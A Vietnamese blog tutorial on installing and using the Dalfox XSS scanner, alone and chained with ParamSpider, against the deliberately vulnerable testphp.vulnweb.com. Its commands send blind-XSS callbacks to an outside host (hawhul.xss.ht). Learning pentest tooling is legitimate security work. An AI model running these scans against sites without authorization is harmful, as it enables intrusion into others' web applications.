Scan lỗ hổng XSS tự động với Dalfox
Dalfox – Công cụ Pentest Web Application
DalFox là một công cụ quét XSS mã nguồn mở mạnh mẽ, phân tích tham số và tiện ích giúp đẩy nhanh quá trình phát hiện và xác minh các lỗi XSS. Nó đi kèm với một công cụ kiểm tra mạnh mẽ, nhiều tính năng thích hợp dành cho các nhà Pentester. Tác giả của công cụ này đó là HAHWUL, là một kỹ sư và là nhà bảo mật. Ngoài ra Dalfox còn là một trong những công cụ pentest web application hữu ích nhất hiện nay và nên được sử dụng bởi mọi nhà pentester để tìm kiếm và sửa các lỗ hổng bảo mật trong trang web
Cách cài đặt công cụ Dalfox
Để sử dụng được Dalfox, đương nhiên bạn cần cài đặt nó rồi :>, và cách cài đặt Dalfox cũng khá đơn giản, bạn chỉ cần làm như sau:
Đối với Kali Linux: bạn chỉ cần copy đoạn code Python bên dưới, sau đó lưu nó một cái tên bất kì và kèm theo đuôi .py, ở đây mình lưu là name.py, sau khi paste code và lưu code rồi, bây giờ bạn chỉ cần chạy lệnh sau sudo apt install golang -y sau đó chạy script Python bằng cách sử dụng lệnh python tênfile.py
Và như vậy, Dalfox sẽ tự động cài về máy Kali Linux của bạn
#!/usr/bin/env python3
import os
import sys
def install_golang_module(module):
modulename = module.split("/")[-1].lower()
if not os.path.exists("/opt/" + modulename):
print("Installing go module " + modulename)
cmdseries = ["sudo -E GO111MODULE=on go get -v " + module,
"sudo ln -s /opt/" + modulename + "/bin/" + \
modulename + " /usr/local/bin/" + modulename]
os.environ["GOPATH"] = "/opt/" + modulename
for cmdstring in cmdseries:
os.system(cmdstring)
if __name__ == '__main__':
golang_modules_to_install = ['github.com/hahwul/dalfox']
for module in golang_modules_to_install:
install_golang_module(module)
Đối với Windows: Bạn download https://github.com/hahwul/dalfox/releases/ và giải nén nó ra sau đó chỉ việc mở terminal lên và chạy thôi
Cách sử dụng Dalfox
Để quét được lỗ hổng XSS trên 1 website bất kì chúng ta có cú pháp lệnh như sau:
dalfox url websitecoxss -b hawhul.xss.ht
Ví dụ:
dalfox url http://testphp.vulnweb.com:80/hpp/index.php?pp=FUZZ -b hawhul.xss.ht
Và đây là kết quả:
Ngoài ra Dalfox có rất nhiều câu lệnh hay và thú vị khác nhau, bạn có thể tự tìm hiểu tại trang GitHub của Dalfox nhé
Cách sử dụng Dalfox + ParamSpider để quét lỗ hổng tự động
Dành cho những bạn nào chưa biết về công cụ ParamSpider thì công cụ Paramspider được phát triển bởi Devansh Batham, công cụ này có chức năng “khai thác tham số từ các góc tối của web”. Nói nôm na là nó giống như Craw các url có khả năng bị tấn công.
Cách cài đặt Paramspider:
git clone https://github.com/devanshbatham/ParamSpider.git
cd ParamSpider
pip install -r requirements.txt hoặc pip3 install -r requirements.txt
python paramspider.py -d têndomain hoặc python3 paramspider.py -d têndomain
Cách dùng Paramspider + Dalfox:
Cú pháp lệnh python paramspider.py -d têndomain -o TênFileoutput.txt
Ví dụ:
python paramspider.py -d testphp.vulnweb.com -o vuln.xss
Output có dạng như sau:
Như vậy, chúng ta đã có các url của web, bây giờ chuyển qua Dalfox để scan từng url
Cú pháp lệnh như sau: dalfox file đườngdẫnchứa\TênFileoutput.txt -b hawhul.xss.ht
Ví dụ: dalfox file vuln.xss -b hawhul.xss.ht
Sau đây là kết quả khá nhiều anh em mong đợi :>
Như vậy có khá nhiều Payload Xss được hiện ra !!!